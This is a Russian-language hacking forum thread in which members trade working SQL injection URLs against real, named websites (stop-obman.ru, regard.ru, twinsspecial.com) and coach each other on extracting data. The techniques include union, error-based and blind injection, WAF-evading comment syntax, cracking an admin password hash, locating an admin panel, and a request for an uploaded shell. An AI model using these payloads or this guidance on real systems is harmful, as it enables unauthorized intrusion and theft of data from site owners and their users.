Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    А сами не умеете вообще? учитесь.

    http://stop-obman.ru/organizations....*/from/**/user/**/where/**/role='root'))))='1

    пароль есть на cmd5
    админка по адресу stop-obman.ru/backend будет

    [​IMG]
     
    segodnya likes this.
  2. segodnya

    segodnya New Member

    Joined:
    26 Oct 2015
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0

    спасибо большое, а вы как я вижу шелл залили? если можно в лс дайте.
    да тренируюсь на Linux kali, читаю. учусь.

    и еще вопрос, это точно md5 да ?
     
  3. xivi00

    xivi00 Banned

    Joined:
    23 Nov 2013
    Messages:
    49
    Likes Received:
    1
    Reputations:
    0
  4. xivi00

    xivi00 Banned

    Joined:
    23 Nov 2013
    Messages:
    49
    Likes Received:
    1
    Reputations:
    0
    там 500
    [​IMG]
     
  5. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    ахринеть , о чём говорить 500 ошибка ?
     
  6. }{@ker

    }{@ker New Member

    Joined:
    27 Apr 2007
    Messages:
    4
    Likes Received:
    2
    Reputations:
    0
  7. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Случайно сканер не ахунейтик? ошибки из-за []
     
  8. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    С твоей непонятно, но есть другая:

    http://www.regard.ru/comparen.htm?i...Value(1,concat(0x3a,(select(version())))))='1
    или
    http://www.regard.ru/comparen.htm?id=e345280615ca44adab458f949c114de1a'+union+select+1,user()+--+
    regard@localhost
    5.5.44-0+deb7u1-log

    Вывод в самом низу страницы (проще в коде глянуть)
     
    SaNDER likes this.
  9. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    там тоже работает, если передать массив вместо строки.

    2 all. перестаньте постить нераскрученные скули и отчеты ваших сканеров. старайтесь все делать сами, а если что то и не выходит то опишите конкретно проблему, что именно не получаеться.
     
    _________________________
  10. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    1) почитал обе статьи (http://www.securitylab.ru/news/470546.php)
    есть проблемы, например при запросе
    пишет
    как то решается эта проблема?

    2) нашел нужные мне таблицу и колонку
    тоесть ответ
    зх как составить запрос чтобы хотяб через блинд вывести данные
     
  11. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    у вас версия ниже 5.1, используйте другой error-based вектор
     
    _________________________
  12. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    а как составить вектор для blind работает и без procedure analyse?
     
  13. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    да есть я писал об етом

    после лимита "and" как это?
     
  14. ButilkaSoka

    ButilkaSoka Member

    Joined:
    4 Jun 2015
    Messages:
    22
    Likes Received:
    12
    Reputations:
    0
    Хелп.
    Тема такая, не могу вывести данные.
    Code:
    http://www.twinsspecial.com/product-detail.php?id=-70' /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,/*!unhex(hex(group_concat(table_name)))*/,26,27,28,29 from {f information_schema.tables} --+  or ''='
    в schema_name есть twinsspe_twins, но не выводится из неё инфа.
    скорей всего нету там просто ничего.
     
  15. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    Ты работаешь под этой БД. В твоем запросе как раз и выводятся таблицы из этой БД.
     
    _________________________
  16. Paladin

    Paladin New Member

    Joined:
    28 Oct 2015
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
  17. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    Зачем вы кавычку вконце поставили я вообще не пойму.
    Unknown column 'root' in 'where clause'
    Обычная ошибка бд, никакой sql inj
     
    segodnya likes this.
  18. xivi00

    xivi00 Banned

    Joined:
    23 Nov 2013
    Messages:
    49
    Likes Received:
    1
    Reputations:
    0
    И где там уязвимость?*
     
  19. vikler

    vikler Member

    Joined:
    16 Aug 2012
    Messages:
    93
    Likes Received:
    7
    Reputations:
    0
    ну как бы, tab_06
    tab_06=2619+and+1=1 [true=>корректрый вывод]
    tab_06=2619+and+1=2 [false=>пустой вывод]
     
  20. xivi00

    xivi00 Banned

    Joined:
    23 Nov 2013
    Messages:
    49
    Likes Received:
    1
    Reputations:
    0
    Извеняюсь протупил